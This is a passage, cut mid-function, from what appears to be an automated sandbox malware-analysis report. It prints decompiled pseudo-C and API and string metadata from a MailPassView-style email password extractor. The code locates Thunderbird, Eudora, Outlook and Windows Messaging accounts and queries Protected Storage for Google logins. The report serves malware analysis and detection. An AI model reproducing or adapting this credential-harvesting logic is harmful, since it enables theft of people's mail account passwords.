                                                                                				char _v292;
                                                                                				void _v547;
                                                                                				char _v548;
                                                                                				void _v1058;
                                                                                				short _v1060;
                                                                                				void _v1570;
                                                                                				short _v1572;
                                                                                				int _t88;
                                                                                				signed int _t91;
                                                                                				signed int _t92;
                                                                                				signed int _t94;
                                                                                				signed int _t96;
                                                                                				signed int _t99;
                                                                                				signed int _t104;
                                                                                				signed short* _t110;
                                                                                				void* _t113;
                                                                                				void* _t114;
                                                                                
                                                                                				_t92 = 0;
                                                                                				_v20 = 0xa3;
                                                                                				_v19 = 0x1e;
                                                                                				_v18 = 0xf3;
                                                                                				_v17 = 0x69;
                                                                                				_v16 = 7;
                                                                                				_v15 = 0x62;
                                                                                				_v14 = 0xd9;
                                                                                				_v13 = 0x1f;
                                                                                				_v12 = 0x1e;
                                                                                				_v11 = 0xe9;
                                                                                				_v10 = 0x35;
                                                                                				_v9 = 0x7d;
                                                                                				_v8 = 0x4f;
                                                                                				_v7 = 0xd2;
                                                                                				_v6 = 0x7d;
                                                                                				_v5 = 0x48;
                                                                                				_v292 = 0;
                                                                                				memset( &_v291, 0, 0xff);
                                                                                				_v548 = 0;
                                                                                				memset( &_v547, 0, 0xff);
                                                                                				_v1572 = 0;
                                                                                				memset( &_v1570, 0, 0x1fe);
                                                                                				_v1060 = 0;
                                                                                				memset( &_v1058, 0, 0x1fe);
                                                                                				_v36 = _a4 + 4;
                                                                                				_a4 = 0;
                                                                                				_v24 = 0xff;
                                                                                				GetComputerNameA( &_v292,  &_v24); // executed
                                                                                				_v24 = 0xff;
                                                                                				GetUserNameA( &_v548,  &_v24); // executed
                                                                                				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
                                                                                				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
                                                                                				_v32 = strlen( &_v292);
                                                                                				_t88 = strlen( &_v548);
                                                                                				_t113 = _v36;
                                                                                				_v28 = _t88;
                                                                                				memcpy(_t113,  &_v20, 0x10);
                                                                                				_t91 = 0xba0da71d;
                                                                                				if(_v28 > 0) {
                                                                                					_t110 =  &_v1060;
                                                                                					do {
                                                                                						_t104 = _a4 & 0x80000003;
                                                                                						if(_t104 < 0) {
                                                                                							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
                                                                                						}
                                                                                						_t96 = ( *_t110 & 0x0000ffff) * _t91;
                                                                                						_t91 = _t91 * 0xbc8f;
                                                                                						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
                                                                                						_a4 = _a4 + 1;
                                                                                						_t110 =  &(_t110[1]);
                                                                                					} while (_a4 < _v28);
                                                                                				}
                                                                                				if(_v32 > _t92) {
                                                                                					do {
                                                                                						_t99 = _a4 & 0x80000003;
                                                                                						if(_t99 < 0) {
                                                                                							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
                                                                                						}
                                                                                						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
                                                                                						_t91 = _t91 * 0xbc8f;
                                                                                						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
                                                                                						_a4 = _a4 + 1;
                                                                                						_t92 = _t92 + 1;
                                                                                					} while (_t92 < _v32);
                                                                                				}
                                                                                				return _t91;
                                                                                			}










































                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                • String ID: 5$H$O$b$i$}$}
                                                                                • API String ID: 1832431107-3760989150
                                                                                • Opcode ID: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                                                • Instruction ID: 8a8033fc9206e0c4c361a826d49ab5f0cafd1e40d7200dcd25d3d532c5214641
                                                                                • Opcode Fuzzy Hash: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                                                • Instruction Fuzzy Hash: AC510871C0025DBEDB11CBA8CC41AEEBBBDEF49314F0442EAE955E6191D3389B84CB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00406EC3(void** __eax) {
                                                                                				void* __esi;
                                                                                				void* _t15;
                                                                                				int _t16;
                                                                                				int _t17;
                                                                                				void* _t26;
                                                                                				void** _t38;
                                                                                				void** _t40;
                                                                                				void* _t45;
                                                                                
                                                                                				_t40 = __eax;
                                                                                				_t15 =  *__eax;
                                                                                				if(_t15 != 0xffffffff) {
                                                                                					_t16 = FindNextFileA(_t15,  &(__eax[0x52])); // executed
                                                                                					 *(_t45 + 4) = _t16;
                                                                                					if(_t16 != 0) {
                                                                                						goto L5;
                                                                                					} else {
                                                                                						E00406F5B(_t40);
                                                                                						goto L4;
                                                                                					}
                                                                                				} else {
                                                                                					_t26 = FindFirstFileA( &(__eax[1]),  &(__eax[0x52])); // executed
                                                                                					 *_t40 = _t26;
                                                                                					 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
                                                                                					L4:
                                                                                					if( *(_t45 + 4) != 0) {
                                                                                						L5:
                                                                                						_t38 =  &(_t40[0xa2]);
                                                                                						_t28 =  &(_t40[0x5d]);
                                                                                						_t41 =  &(_t40[0xf3]);
                                                                                						_t17 = strlen( &(_t40[0xf3]));
                                                                                						if(strlen( &(_t40[0x5d])) + _t17 + 1 >= 0x143) {
                                                                                							 *_t38 = 0;
                                                                                						} else {
                                                                                							E004062AD(_t38, _t41, _t28);
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return  *(_t45 + 4);
                                                                                			}


                                                                                APIs
                                                                                • FindFirstFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406ED9
                                                                                • FindNextFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406EF7
                                                                                • strlen.MSVCRT ref: 00406F27
                                                                                • strlen.MSVCRT ref: 00406F2F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindstrlen$FirstNext
                                                                                • String ID: rA
                                                                                • API String ID: 379999529-474049127
                                                                                • Opcode ID: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                                                • Instruction ID: 479c8733b6b08075922562257f7174063dbd0ea9e1486761d8d5d3546bede414
                                                                                • Opcode Fuzzy Hash: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                                                • Instruction Fuzzy Hash: 00118272005205AFD714DB34E844ADBB3D9DF44324F21493FF55AD21D0EB38A9548758
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 97%
                                                                                			E00401E8B(void* __eflags, char* _a4) {
                                                                                				signed int _v8;
                                                                                				int _v12;
                                                                                				void _v275;
                                                                                				char _v276;
                                                                                				void _v539;
                                                                                				char _v540;
                                                                                				void _v795;
                                                                                				char _v796;
                                                                                				void _v1059;
                                                                                				char _v1060;
                                                                                				void _v1323;
                                                                                				char _v1324;
                                                                                				void _v2347;
                                                                                				char _v2348;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				int _t65;
                                                                                				char* _t69;
                                                                                				char _t70;
                                                                                				int _t71;
                                                                                				char _t75;
                                                                                				void* _t76;
                                                                                				long _t78;
                                                                                				void* _t83;
                                                                                				int _t85;
                                                                                				void* _t87;
                                                                                				int _t104;
                                                                                				int _t108;
                                                                                				char _t126;
                                                                                				void* _t137;
                                                                                				void* _t139;
                                                                                				char* _t157;
                                                                                				char* _t158;
                                                                                				char* _t160;
                                                                                				int _t161;
                                                                                				void* _t164;
                                                                                				CHAR* _t169;
                                                                                				char* _t170;
                                                                                				void* _t171;
                                                                                				void* _t172;
                                                                                				void* _t173;
                                                                                				void* _t174;
                                                                                				void* _t175;
                                                                                
                                                                                				_v540 = 0;
                                                                                				memset( &_v539, 0, 0x104);
                                                                                				_t164 = 0x1a;
                                                                                				E0040EE59( &_v540, _t164); // executed
                                                                                				_t65 = strlen("Mozilla\\Profiles");
                                                                                				_t6 = strlen( &_v540) + 1; // 0x1
                                                                                				_t172 = _t171 + 0x14;
                                                                                				if(_t65 + _t6 >= 0x104) {
                                                                                					_t69 = _a4;
                                                                                					 *_t69 = 0;
                                                                                					_t157 = _t69;
                                                                                				} else {
                                                                                					_t157 = _a4;
                                                                                					E004062AD(_t157,  &_v540, "Mozilla\\Profiles");
                                                                                				}
                                                                                				_t70 = E0040614B(_t157);
                                                                                				if(_t70 == 0) {
                                                                                					 *_t157 = _t70;
                                                                                				}
                                                                                				_t158 = _t157 + 0x105;
                                                                                				_t71 = strlen("Thunderbird\\Profiles");
                                                                                				_t12 = strlen( &_v540) + 1; // 0x1
                                                                                				if(_t71 + _t12 >= 0x104) {
                                                                                					 *_t158 = 0;
                                                                                				} else {
                                                                                					E004062AD(_t158,  &_v540, "Thunderbird\\Profiles");
                                                                                				}
                                                                                				_t75 = E0040614B(_t158);
                                                                                				_pop(_t137);
                                                                                				if(_t75 == 0) {
                                                                                					 *_t158 = _t75;
                                                                                				}
                                                                                				_t160 = _a4 + 0x20a;
                                                                                				_t76 = E00401C97(_t137, _t160, 0x80000001, "Software\\Qualcomm\\Eudora\\CommandLine", "current"); // executed
                                                                                				_t173 = _t172 + 0xc;
                                                                                				if(_t76 == 0) {
                                                                                					_t126 = E00401C97(_t137, _t160, 0x80000002, "Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", 0x412466); // executed
                                                                                					_t173 = _t173 + 0xc;
                                                                                					if(_t126 == 0) {
                                                                                						 *_t160 = _t126;
                                                                                					}
                                                                                				}
                                                                                				_v8 = _v8 & 0x00000000;
                                                                                				_t78 = E0040EB3F(0x80000002, "Software\\Mozilla\\Mozilla Thunderbird",  &_v8);
                                                                                				_t174 = _t173 + 0xc;
                                                                                				if(_t78 != 0) {
                                                                                					L32:
                                                                                					_t169 = _a4 + 0x30f;
                                                                                					if( *_t169 != 0) {
                                                                                						L35:
                                                                                						return _t78;
                                                                                					}
                                                                                					ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t169, 0x104);
                                                                                					_t78 = E0040614B(_t169);
                                                                                					if(_t78 != 0) {
                                                                                						goto L35;
                                                                                					}
                                                                                					 *_t169 = _t78;
                                                                                					return _t78;
                                                                                				} else {
                                                                                					_v796 = _t78;
                                                                                					_t161 = 0;
                                                                                					memset( &_v795, 0, 0xff);
                                                                                					_v12 = 0;
                                                                                					_t83 = E0040EC05(_v8, 0,  &_v796);
                                                                                					_t175 = _t174 + 0x18;
                                                                                					if(_t83 != 0) {
                                                                                						L31:
                                                                                						_t78 = RegCloseKey(_v8);
                                                                                						goto L32;
                                                                                					}
                                                                                					_t170 = "sqlite3.dll";
                                                                                					do {
                                                                                						_t85 = atoi( &_v796);
                                                                                						_pop(_t139);
                                                                                						if(_t85 < 3) {
                                                                                							goto L28;
                                                                                						}
                                                                                						_v2348 = 0;
                                                                                						memset( &_v2347, _t161, 0x3ff);
                                                                                						_v276 = 0;
                                                                                						memset( &_v275, _t161, 0x104);
                                                                                						sprintf( &_v2348, "%s\\Main",  &_v796);
                                                                                						E0040EBC1(_t139, _v8,  &_v2348, "Install Directory",  &_v276, 0x104);
                                                                                						_t175 = _t175 + 0x38;
                                                                                						if(_v276 != 0 && E0040614B( &_v276) != 0) {
                                                                                							_v1060 = 0;
                                                                                							memset( &_v1059, _t161, 0x104);
                                                                                							_v1324 = 0;
                                                                                							memset( &_v1323, _t161, 0x104);
                                                                                							_t104 = strlen(_t170);
                                                                                							_t41 = strlen( &_v276) + 1; // 0x1
                                                                                							_t175 = _t175 + 0x20;
                                                                                							if(_t104 + _t41 >= 0x104) {
                                                                                								_v1060 = 0;
                                                                                							} else {
                                                                                								E004062AD( &_v1060,  &_v276, _t170);
                                                                                							}
                                                                                							_t108 = strlen("nss3.dll");
                                                                                							_t47 = strlen( &_v276) + 1; // 0x1
                                                                                							if(_t108 + _t47 >= 0x104) {
                                                                                								_v1324 = 0;
                                                                                							} else {
                                                                                								E004062AD( &_v1324,  &_v276, "nss3.dll");
                                                                                							}
                                                                                							if(E0040614B( &_v1060) == 0 || E0040614B( &_v1324) == 0) {
                                                                                								_t161 = 0;
                                                                                								goto L28;
                                                                                							} else {
                                                                                								strcpy(_a4 + 0x30f,  &_v276);
                                                                                								goto L31;
                                                                                							}
                                                                                						}
                                                                                						L28:
                                                                                						_v12 = _v12 + 1;
                                                                                						_t87 = E0040EC05(_v8, _v12,  &_v796);
                                                                                						_t175 = _t175 + 0xc;
                                                                                					} while (_t87 == 0);
                                                                                					goto L31;
                                                                                				}
                                                                                			}

                                                                                0x00000000
                                                                                0x00401fbe
                                                                                0x00401fc3
                                                                                0x00401fc9
                                                                                0x00401fd3
                                                                                0x00401fe3
                                                                                0x00401fe6
                                                                                0x00401feb
                                                                                0x00401ff0
                                                                                0x004021a0
                                                                                0x004021a3
                                                                                0x00000000
                                                                                0x004021a3
                                                                                0x00401ff6
                                                                                0x00401ffb
                                                                                0x00402002
                                                                                0x0040200a
                                                                                0x0040200b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040201e
                                                                                0x00402025
                                                                                0x00402033
                                                                                0x0040203a
                                                                                0x00402052
                                                                                0x0040206e
                                                                                0x00402073
                                                                                0x0040207d
                                                                                0x004020a1
                                                                                0x004020a8
                                                                                0x004020b6
                                                                                0x004020bd
                                                                                0x004020c3
                                                                                0x004020d6
                                                                                0x004020da
                                                                                0x004020df
                                                                                0x004020f8
                                                                                0x004020e1
                                                                                0x004020ef
                                                                                0x004020f5
                                                                                0x00402104
                                                                                0x00402117
                                                                                0x0040211f
                                                                                0x0040213c
                                                                                0x00402121
                                                                                0x00402133
                                                                                0x00402139
                                                                                0x00402152
                                                                                0x00402165
                                                                                0x00000000
                                                                                0x00402189
                                                                                0x00402199
                                                                                0x00000000
                                                                                0x0040219f
                                                                                0x00402152
                                                                                0x00402167
                                                                                0x00402167
                                                                                0x00402177
                                                                                0x0040217c
                                                                                0x0040217f
                                                                                0x00000000
                                                                                0x00402187

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00401EAD
                                                                                • strlen.MSVCRT ref: 00401EC6
                                                                                • strlen.MSVCRT ref: 00401ED4
                                                                                • strlen.MSVCRT ref: 00401F1A
                                                                                • strlen.MSVCRT ref: 00401F28
                                                                                • memset.MSVCRT ref: 00401FD3
                                                                                • atoi.MSVCRT ref: 00402002
                                                                                • memset.MSVCRT ref: 00402025
                                                                                • sprintf.MSVCRT ref: 00402052
                                                                                  • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                • memset.MSVCRT ref: 004020A8
                                                                                • memset.MSVCRT ref: 004020BD
                                                                                • strlen.MSVCRT ref: 004020C3
                                                                                • strlen.MSVCRT ref: 004020D1
                                                                                • strlen.MSVCRT ref: 00402104
                                                                                • strlen.MSVCRT ref: 00402112
                                                                                • memset.MSVCRT ref: 0040203A
                                                                                  • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                                  • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                • strcpy.MSVCRT(?,00000000), ref: 00402199
                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004021A3
                                                                                • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004021BE
                                                                                  • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strlen$memset$Closestrcpy$AttributesEnvironmentExpandFileStringsatoisprintfstrcat
                                                                                • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                • API String ID: 2492260235-4223776976
                                                                                • Opcode ID: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                                                • Instruction ID: fcae88f02dbfb35d0bd4b12665d2d891c1e7b320b053452542e36e55e3802549
                                                                                • Opcode Fuzzy Hash: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                                                • Instruction Fuzzy Hash: C891E472904158BADB21E765CC46FDA77AC9F44308F1004BBF609F2182EB789BD58B5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E0040B9AD(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                				char* _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _v28;
                                                                                				intOrPtr _v32;
                                                                                				void* _v304;
                                                                                				signed int _v308;
                                                                                				struct HWND__* _v312;
                                                                                				intOrPtr _v604;
                                                                                				struct HACCEL__* _v620;
                                                                                				struct HWND__* _v644;
                                                                                				char _v900;
                                                                                				char _v904;
                                                                                				char _v908;
                                                                                				struct tagMSG _v936;
                                                                                				intOrPtr _v940;
                                                                                				struct HWND__* _v944;
                                                                                				struct HWND__* _v948;
                                                                                				char _v956;
                                                                                				char _v980;
                                                                                				char _v988;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* _t49;
                                                                                				void* _t52;
                                                                                				int _t56;
                                                                                				int _t58;
                                                                                				int _t68;
                                                                                				void* _t72;
                                                                                				int _t75;
                                                                                				int _t77;
                                                                                				struct HWND__* _t78;
                                                                                				int _t80;
                                                                                				int _t85;
                                                                                				int _t86;
                                                                                				struct HWND__* _t100;
                                                                                
                                                                                				 *0x416b94 = _a4;
                                                                                				_t49 = E00404837(__ecx);
                                                                                				if(_t49 != 0) {
                                                                                					E0040EDAC();
                                                                                					_t52 = E00406A2C( &_v980);
                                                                                					_t100 = 0;
                                                                                					_v940 = 0x20;
                                                                                					_v948 = 0;
                                                                                					_v936.hwnd = 0;
                                                                                					_v944 = 0;
                                                                                					_v936.message = 0;
                                                                                					E0040B785(_t52,  &_v900);
                                                                                					_v8 =  &_v980;
                                                                                					E00406C87(__eflags,  &_v980, _a12);
                                                                                					_t56 = E00406DFB(_v16, "/savelangfile");
                                                                                					__eflags = _t56;
                                                                                					if(_t56 < 0) {
                                                                                						E0040823D(); // executed
                                                                                						_t58 = E00406DFB(_v8, "/deleteregkey");
                                                                                						__eflags = _t58;
                                                                                						if(_t58 < 0) {
                                                                                							 *0x417110 = 0x11223344; // executed
                                                                                							EnumResourceTypesA( *0x416b94, E0040ED91, 0); // executed
                                                                                							__eflags =  *0x417110 - 0x1c233487;
                                                                                							if( *0x417110 == 0x1c233487) {
                                                                                								__eflags =  *((intOrPtr*)(_v12 + 0x30)) - 1;
                                                                                								if(__eflags <= 0) {
                                                                                									L13:
                                                                                									__imp__CoInitialize(_t100);
                                                                                									E0040B70A( &_v908);
                                                                                									__eflags = _v604 - 3;
                                                                                									if(_v604 != 3) {
                                                                                										_push(5);
                                                                                									} else {
                                                                                										_push(3);
                                                                                									}
                                                                                									ShowWindow(_v644, ??);
                                                                                									UpdateWindow(_v644);
                                                                                									_v620 = LoadAcceleratorsA( *0x416b94, 0x67);
                                                                                									E0040AD9D( &_v908);
                                                                                									_t68 = GetMessageA( &_v936, _t100, _t100, _t100);
                                                                                									__eflags = _t68;
                                                                                									if(_t68 == 0) {
                                                                                										L24:
                                                                                										__imp__CoUninitialize();
                                                                                										goto L25;
                                                                                									} else {
                                                                                										do {
                                                                                											_t75 = TranslateAcceleratorA(_v644, _v620,  &_v936);
                                                                                											__eflags = _t75;
                                                                                											if(_t75 != 0) {
                                                                                												goto L23;
                                                                                											}
                                                                                											_t78 =  *0x4171ac;
                                                                                											__eflags = _t78 - _t100;
                                                                                											if(_t78 == _t100) {
                                                                                												L21:
                                                                                												_t80 = IsDialogMessageA(_v644,  &_v936);
                                                                                												__eflags = _t80;
                                                                                												if(_t80 == 0) {
                                                                                													TranslateMessage( &_v936);
                                                                                													DispatchMessageA( &_v936);
                                                                                												}
                                                                                												goto L23;
                                                                                											}
                                                                                											_t85 = IsDialogMessageA(_t78,  &_v936);
                                                                                											__eflags = _t85;
                                                                                											if(_t85 != 0) {
                                                                                												goto L23;
                                                                                											}
                                                                                											goto L21;
                                                                                											L23:
                                                                                											_t77 = GetMessageA( &_v936, _t100, _t100, _t100);
                                                                                											__eflags = _t77;
                                                                                										} while (_t77 != 0);
                                                                                										goto L24;
                                                                                									}
                                                                                								}
                                                                                								_t86 = E0040B8D7( &_v904, __eflags);
                                                                                								__eflags = _t86;
                                                                                								if(_t86 == 0) {
                                                                                									_t100 = 0;
                                                                                									__eflags = 0;
                                                                                									goto L13;
                                                                                								}
                                                                                								_push(_v28);
                                                                                								_v904 = 0x41356c;
                                                                                								L004115D6();
                                                                                								__eflags = _v304;
                                                                                								if(_v304 != 0) {
                                                                                									DeleteObject(_v304);
                                                                                									_v308 = _v308 & 0x00000000;
                                                                                								}
                                                                                								goto L27;
                                                                                							}
                                                                                							MessageBoxA(0, "Failed to load the executable file !", "Error", 0x30);
                                                                                							goto L25;
                                                                                						}
                                                                                						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
                                                                                						goto L25;
                                                                                					} else {
                                                                                						 *0x417488 = 0x416b28;
                                                                                						E0040836E();
                                                                                						L25:
                                                                                						_push(_v32);
                                                                                						_v908 = 0x41356c;
                                                                                						L004115D6();
                                                                                						__eflags = _v308 - _t100;
                                                                                						if(_v308 != _t100) {
                                                                                							DeleteObject(_v308);
                                                                                							_v312 = _t100;
                                                                                						}
                                                                                						L27:
                                                                                						_v908 = 0x412474;
                                                                                						E00406A4E( &_v988);
                                                                                						E0040462E( &_v956);
                                                                                						E00406A4E( &_v988);
                                                                                						_t72 = 0;
                                                                                						__eflags = 0;
                                                                                						goto L28;
                                                                                					}
                                                                                				} else {
                                                                                					_t72 = _t49 + 1;
                                                                                					L28:
                                                                                					return _t72;
                                                                                				}
                                                                                			}


                                                                                APIs
                                                                                  • Part of subcall function 00404837: LoadLibraryA.KERNEL32(comctl32.dll,73B74DE0,?,00000000,?,?,?,0040B9C9,73B74DE0), ref: 00404856
                                                                                  • Part of subcall function 00404837: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                                                  • Part of subcall function 00404837: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,73B74DE0), ref: 0040487C
                                                                                  • Part of subcall function 00404837: MessageBoxA.USER32 ref: 004048A7
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040BBF8
                                                                                • DeleteObject.GDI32(?), ref: 0040BC0E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MailPassView
                                                                                • API String ID: 745651260-414181363
                                                                                • Opcode ID: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                                                • Instruction ID: 29be9d14b742f54cd69d53bb86675b71f99c80547e1740e7b57482248bd42427
                                                                                • Opcode Fuzzy Hash: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                                                • Instruction Fuzzy Hash: 9D518D71108345ABC7209F61DD09A9BBBF8FF84705F00483FF685A22A1DB789914CB5E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 65%
                                                                                			E00403C3D(signed int __ecx, void* __eflags, void* __fp0) {
                                                                                				char _v8;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				struct HINSTANCE__* _t38;
                                                                                				void* _t52;
                                                                                				void* _t54;
                                                                                				void* _t56;
                                                                                				void* _t58;
                                                                                				void* _t60;
                                                                                				char* _t73;
                                                                                				void* _t76;
                                                                                				_Unknown_base(*)()* _t86;
                                                                                				void* _t87;
                                                                                				void* _t89;
                                                                                				signed int _t98;
                                                                                				char* _t106;
                                                                                				_Unknown_base(*)()* _t120;
                                                                                				void* _t131;
                                                                                
                                                                                				_t131 = __fp0;
                                                                                				_t91 = __ecx;
                                                                                				_push(__ecx);
                                                                                				_t98 = __ecx;
                                                                                				_t89 = __ecx + 0x87c;
                                                                                				 *(_t89 + 0xc) =  *(_t89 + 0xc) & 0x00000000;
                                                                                				E0040E894(_t89);
                                                                                				_t38 = LoadLibraryA("pstorec.dll"); // executed
                                                                                				 *(_t89 + 8) = _t38;
                                                                                				if(_t38 == 0) {
                                                                                					L4:
                                                                                					E0040E894(_t89);
                                                                                				} else {
                                                                                					_t86 = GetProcAddress(_t38, "PStoreCreateInstance");
                                                                                					_t120 = _t86;
                                                                                					_t91 = 0 | _t120 != 0x00000000;
                                                                                					 *(_t89 + 0x10) = _t86;
                                                                                					if(_t120 != 0) {
                                                                                						goto L4;
                                                                                					} else {
                                                                                						_t91 = _t89 + 4;
                                                                                						_t87 =  *_t86(_t89 + 4, 0, 0, 0);
                                                                                						_t122 = _t87;
                                                                                						if(_t87 != 0) {
                                                                                							goto L4;
                                                                                						} else {
                                                                                							 *(_t89 + 0xc) = 1;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				E004047A0(_t98 + 0x890, _t122);
                                                                                				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Gmail account");
                                                                                				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Gmail account");
                                                                                				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Google Account");
                                                                                				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Google Account");
                                                                                				_push(_t98 + 0x858); // executed
                                                                                				E0040754D(_t91, _t122); // executed
                                                                                				E0040719C(_t91, _t98 + 0x86c); // executed
                                                                                				E0040765B(_t122, _t98 + 0x878); // executed
                                                                                				_t52 = E0040EB3F(0x80000001, "Software\\Microsoft\\Internet Account Manager\\Accounts",  &_v8);
                                                                                				_t123 = _t52;
                                                                                				if(_t52 == 0) {
                                                                                					E00402BB8(_t91,  &_v8, _t123, _t131, _t98, 1);
                                                                                				}
                                                                                				_t54 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts",  &_v8);
                                                                                				_t124 = _t54;
                                                                                				if(_t54 == 0) {
                                                                                					E00402BB8(_t91,  &_v8, _t124, _t131, _t98, 5);
                                                                                				}
                                                                                				E00402C44(_t91, _t131, _t98); // executed
                                                                                				 *((intOrPtr*)(_t98 + 0xb1c)) = 6;
                                                                                				_t56 = E00406278();
                                                                                				_push( &_v8);
                                                                                				if( *((intOrPtr*)(_t56 + 0x10)) != 1) {
                                                                                					_push("Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles");
                                                                                				} else {
                                                                                					_push("Software\\Microsoft\\Windows Messaging Subsystem\\Profiles");
                                                                                				}
                                                                                				_push(0x80000001);
                                                                                				_t58 = E0040EB3F();
                                                                                				_t126 = _t58;
                                                                                				if(_t58 != 0) {
                                                                                					 *((char*)(_t98 + 0xa9c)) = 0;
                                                                                				} else {
                                                                                					E00402B09( &_v8, _t126, _t131, _t98);
                                                                                				}
                                                                                				 *((intOrPtr*)(_t98 + 0xb1c)) = 0xf;
                                                                                				_t60 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles",  &_v8);
                                                                                				_t127 = _t60;
                                                                                				if(_t60 != 0) {
                                                                                					 *((char*)(_t98 + 0xa9c)) = 0;
                                                                                				} else {
                                                                                					E00402B09( &_v8, _t127, _t131, _t98);
                                                                                				}
                                                                                				E0040E8AB(_t89);
                                                                                				E004047F1(_t98 + 0x890);
                                                                                				E00402FC2(_t98, _t91, _t131, 0x80000001); // executed
                                                                                				E00402FC2(_t98, _t91, _t131, 0x80000002); // executed
                                                                                				E0040329E(_t131, _t98);
                                                                                				E004034CB(_t91, _t127, _t131, _t98); // executed
                                                                                				E0040396C(_t127, _t131, _t98); // executed
                                                                                				E004037B1(_t91, _t98, _t131, _t98); // executed
                                                                                				_t73 = _t98 + 0xb20;
